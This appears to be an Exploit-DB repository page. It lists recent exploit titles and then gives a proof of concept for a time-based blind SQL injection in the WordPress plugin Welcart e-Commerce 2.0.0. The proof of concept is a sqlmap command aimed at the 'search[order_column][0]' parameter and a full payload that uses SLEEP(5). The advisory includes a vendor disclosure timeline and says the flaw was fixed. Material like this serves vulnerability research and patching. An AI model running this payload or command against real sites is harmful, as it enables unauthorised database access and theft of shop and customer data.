84533192ae
19 changes to exploits/shellcodes SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution SmartFoxServer 2X 2.17.0 - Credentials Disclosure Millewin 13.39.146.1 - Local Privilege Escalation AMD Fuel Service - 'Fuel.service' Unquote Service Path Microsoft Internet Explorer 11 32-bit - Use-After-Free SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS Jenzabar 9.2.2 - 'query' Reflected XSS. WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS) Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS) WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
29 lines
No EOL
1.7 KiB
Text
29 lines
No EOL
1.7 KiB
Text
# Exploit Title: WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection
|
|
# Date: 04/08 2020
|
|
# Exploit Author: Erik David Martin
|
|
# Vendor Homepage: https://www.welcart.com/
|
|
# Software Link: https://downloads.wordpress.org/plugin/usc-e-shop.2.0.0.zip
|
|
# Category: Web Application
|
|
# Version: 2.0.0
|
|
# Tested on: Ubuntu 18.04.04 LTS / WordPress 5.4.2
|
|
|
|
# 05/08 2020: Vendor notified
|
|
# 06/08 2020: Vendor requested detailed information
|
|
# 06/08 2020: Information provided
|
|
# 11/08 2020: Vendor notified that a patch will be provided. No current ETA
|
|
# 10/12 2020: Vulnerability fixed
|
|
|
|
# 1. Description
|
|
|
|
The POST parameter "search[order_column][0]" does not sanitize user input when searching through the order lists.
|
|
|
|
# 2. Proof of Concept (PoC)
|
|
|
|
Use ZAP/Burp to capture the web request when searching through existing order lists and save it to request.txt
|
|
Referer: http://192.168.0.63/wp-admin/admin.php?page=usces_orderlist
|
|
|
|
sqlmap -r request.txt --dbms=mysql -p search[order_column][0]
|
|
|
|
Parameter: search[order_column][0] (POST)
|
|
Type: time-based blind
|
|
Payload: search[order_column][0]=ID) AND (SELECT 9900 FROM (SELECT(SLEEP(5)))tKPd) AND (8867=8867&search[order_word][0]=test&search[order_word_term][0]=contain&search[order_term]=AND&search[order_column][1]=&search[order_word][1]=&search[order_word_term][1]=contain&search[product_column][0]=&search[product_word][0]=&search[product_word_term][0]=contain&search[product_term]=AND&search[product_column][1]=&search[product_word][1]=&search[product_word_term][1]=contain&searchIn=Search&allchange[column]=&collective=&wc_nonce=5e3ed8895f&_wp_http_referer=/wp-admin/admin.php?page=usces_orderlist |